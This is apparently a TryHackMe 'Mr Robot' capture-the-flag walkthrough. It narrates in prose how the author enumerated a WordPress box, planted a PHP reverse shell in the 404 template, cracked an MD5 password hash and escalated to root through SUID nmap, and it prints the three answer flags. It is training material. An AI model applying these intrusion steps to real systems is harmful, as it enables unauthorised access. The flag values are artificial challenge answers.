TryHackMe – Mr Robot
What is key 1?
Start with basic nmap scan:
Looking at the web page, there wasn’t anything immediately interesting.
Let’s use gobuster to see if there’s anything interesting accessible but not on the surface of the webapp:
Robots stands out…lets go take a look:
Looks like one of the keys is easily accessible over the web but was “hidden”:
073403c8a58a1f80d943455fb30724b9
What is key 2?
Poking around on more of the pages found by gobuster, we find one that stands out. Inspecting the source reveals some hidden text. Seems like they may be giving us a password for the admin login pages we found elsewhere?
Tried using this as a password with a bunch of random usernames before thinking that this is probably an encoded value….yup:
We’re in as Elliot:
Poking around as Elliot, looking at users we see another use and on her page it looks like a reference to another key in her bio. Luckily we can create a new password for her (since we are the admin) and log in as her to take a look:
We’re in as Krista:
Unfortunately…don’t see anything of interest.
Back to Elliot’s account…
Looks like there is a section where Elliot can upload media:
Try uploading revshell.jpg.php:
First start netcat listener:
Upload successful:
Can’t run the file tho (it seems to have decent filtering in place and adds an underscore before .jpg at the end to prevent the filetype from being interpreted as anything but jpg)
After trying a bit, don’t notice a way to bypass the filter easily. Instead, maybe we can create our own weak upload function….There is also a spot to manage plug-ins:
Clicking “add new” shows us we can browse their library of extensions, download one we want, and then upload the extension as a .zip to get that functionality.
I browsed their library and found this one which I hope won’t filter for certain file types only:
Upload it to the site:
The plug-in installed but I don’t know enough about workpress to figure out where to enable it and the examples I found for this extension seem to be for a “contact” section which isn’t available in Elliot’s portal.
*Had to pause at this point and now picking back up on a different day. After looking at a walk through for a hint at the right direction, it looks like we can instead upload the script to a template 404 page so we will start there*
Go to Appearance > Editor:
Select the 404 template in the top right…
Copy and paste the contents of our revshell.php into the template:
Now, whenever we hit a 404 it should run this script.
Lets start up a netcat listener again:
Now we can visit any pathway that doesn’t exist (i.e. http://10.10.153.190/anything) and the listener will connect:
First, let’s stabilize our shell:
Now time for some initial enumeration…after poking around, we find key-2-of-3.txt in /home/robot
It is not accessible to us as we are daemon…but there is a paddword.raw-md5 which is likely the MD5 of robot’s password:
Lets’ grab that:
We could bring this to JohnTheRipper but a faster path would be to just look it up in an MD5 database online:
And, we’re in as robot and can get key #2!
822c73956184f694993bede3eb39f959
What is key 3?
Now, we could have used Metasploit previously which may have made this privesc a lot easier but we’re going to do this on our own…
Looks like the box is running Ubuntu 14.04
Looking on exploit-db, we find what appears to be a suitable vulnerability:
Let’s copy/paste this into sublime, save as .c file and then start a web server locally and grab it from our victim machine:
Hmm….robot doesn’t have sufficient permissions to write that file here
Looking at SUID binaries we have:
Su seems interesting, looking at GTFObins we find:
Did not seem to work out tho:
Okay, let’s pivot to mount…looks promising on GTFObins:
Looks like I didn’t enumerate enough the first time and used an insufficient command, a second pass with better enumeration for SUID binaries reveals:
nmap really stands out on that list, and sure enough it looks like there is a wealth of options on GTFObins:
Let’s try that out:
It works! And we get key 3:
04787ddef27c3dee1ee161b21670b4e4